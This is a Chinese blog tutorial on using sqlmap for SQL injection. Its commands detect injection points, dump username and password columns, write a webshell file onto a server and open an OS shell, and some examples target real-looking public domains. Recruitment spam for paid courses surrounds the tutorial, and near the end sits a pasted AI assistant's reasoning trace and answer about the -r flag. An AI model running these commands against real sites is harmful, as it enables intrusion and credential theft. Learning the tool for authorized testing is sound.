sqlmap的使用_sqlmap --force-ssl

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

下面介绍几种对于post请求的sqlmap注入。
1.使用http请求文件
可以用burpsuite抓包并复制到txt文件

sqlmap -r  1 .txt

2.使用burpsuite log文件 (勾选上options中的Misc中的proxy)

sqlmap  - l log.txt

3.HTTPS
sqlmap同时也支持https的sql注入,只需加入参数-force-ssl告诉sqlmap这是https服务即可。

sqlmap -u https://192.168.1.1/a.php?id=1" -force-ssl  (默认不是443,在后加其端口)

3.–date

sqlmap -u http://127.0.0.1/sqli-labs-master/Less-11/ --data="uname=1111&passwd=11111&submit=Submit" --dbs

"uname=1111&passwd=11111&submit=Submit"为请求参数

4 常用方法

4.1 检测注入
4.1.1基本格式
sqlmap -u “http://www.vuln.cn/post.php?id=1”

默认使用level1检测全部数据库类型

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3

指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)

4.1.2 cookie注入

当程序有防get注入的时候,可以使用cookie注入

sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2(只有level达到2才会检测cookie)

4.1.3 从post数据包中注入

可以使用burpsuite或者temperdata等工具来抓取post包

sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql    指定username参数

4.2 注入成功后
4.2.1 获取数据库基本信息
sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbs

查询有哪些数据库

sqlmap -u URL --current-db --batch 

获取当前数据库

sqlmap -u “http://www.vuln.cn/post.php?id=1”  -D test –tables

查询test数据库中有哪些表

sqlmap -u “http://www.vuln.cn/post.php?id=1” -D test -T admin –columns

查询test数据库中admin表有哪些字段

```bash
sqlmap -u “http://www.vuln.cn/post.php?id=1” -D test -T admin -C “username,password” –dump

dump出字段username与password中的数据

其他命令参考下面
从数据库中搜索字段

sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password

在dedecms数据库中搜索字段admin或者password。

读取与写入文件
首先找需要网站的物理路径,其次需要有可写或可读权限。

–file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径)
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 (mssql xp_shell)
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

#示例:
sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”

使用shell命令:
sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell
接下来指定网站可写目录:
“E:\php\htdocs\dvwa”

#注:mysql不支持列目录,仅支持读取单个文件。sqlserver可以列目录,不能读写文件,但需要一个(xp_dirtree函数)

5 总结

目前这个只是最常规的使用,还得多多练习,后续继续更新!

更多分享微信搜索“安全info”公众号
添加群主进“安全交流”微信群
在这里插入图片描述

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

<think>嗯,用户想了解sqlmap工具中的-r参数用法。首先我需要回忆一下这个参数的具体作用。记得-r参数是用来指定一个包含HTTP请求的文件,这样sqlmap就可以直接解析这个文件中的请求来进行注入测试,而不需要手动输入URL或其他参数。这在处理POST请求或者复杂的请求头时特别有用。 接下来,我需要确认用户提供的例子是否正确。根据参考中的引用[1],用户给出了例子sqlmap.py -r D:\python\a.txt -D security -T users --columns。这说明使用-r参数后跟文件路径,确实是指定请求文件。同时,用户可能想知道如何准备这样的请求文件,比如通过Burp Suite截取请求并保存为txt文件。 然后,要注意用户可能遇到的问题,比如文件路径是否正确,请求文件是否需要包含完整的HTTP请求,包括请求头和请求体。同时,可能需要提醒用户在使用-r参数时,是否需要结合其他参数,比如指定数据库(-D)、表(-T)等。 另外,引用[2]和[3]提到了其他参数和GUI的使用,但用户目前只关心-r参数,所以需要集中回答这个点,避免分散。需要说明-r参数的优势,比如自动化处理POST请求,避免手动构造请求的麻烦,以及如何结合tamper脚本绕过过滤机制。 还要考虑用户的使用场景,比如他们可能在测试一个需要登录的网站,或者处理复杂的表单提交,这时候-r参数就非常方便。同时,需要强调使用-r参数时,请求文件必须完整,否则可能导致sqlmap无法正确解析,进而影响测试结果。 最后,根据用户提供的示例,可能还需要补充一些使用注意事项,例如文件格式的正确性,确保请求中的注入点位置正确标记(比如在参数值后面加上*),以及如何处理HTTPS请求等。此外,引用中的例子是否有特殊环境要求,比如是否需要配合其他工具使用,比如Burp Suite来捕获请求。 总结一下,回答需要包括-r参数的作用、使用步骤、示例、注意事项,并结合引用中的例子进行说明,确保用户能清晰理解并正确应用该参数。</think>### SQLMAP -r参数使用说明 `-r`参数用于从文件中加载HTTP请求数据,常用于测试POST请求或复杂请求头场景。以下是详细说明: #### 一、核心作用 1. **自动解析请求**:直接读取包含完整HTTP请求的文件(如Burp Suite保存的.txt文件),无需手动拼接参数[^1] 2. **支持复杂请求**:可处理含Cookie、自定义Header、POST表单等复杂请求结构 3. **精准定位注入点**:自动识别URL参数、POST参数、Cookie等潜在注入位置 #### 二、使用步骤 1. **捕获请求**: ```http POST /login.php HTTP/1.1 Host: example.com Cookie: PHPSESSID=1234 Content-Type: application/x-www-form-urlencoded username=admin&password=test* # 用*标记注入点 ``` 2. **保存请求文件**: ```python # 保存为request.txt ``` 3. **执行扫描**: ```bash sqlmap.py -r request.txt --level 3 --risk 2 ``` #### 三、典型应用场景 1. **POST注入测试**: ```bash sqlmap.py -r post_request.txt --dbs ``` 2. **带Cookie的认证测试**(如引用示例): ```bash sqlmap.py -r D:\python\a.txt -D security -T users --columns ``` 3. **配合tamper脚本**(如引用示例[^2]): ```bash sqlmap.py -r request.txt --tamper=space2comment ``` #### 四、注意事项 1. 文件必须包含完整的HTTP请求头和请求体 2. 使用`*`标记注入点位置(非必需但推荐) 3. 支持HTTPS请求(需保留`Host`头) 4. 可配合`--force-ssl`强制使用SSL连接
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值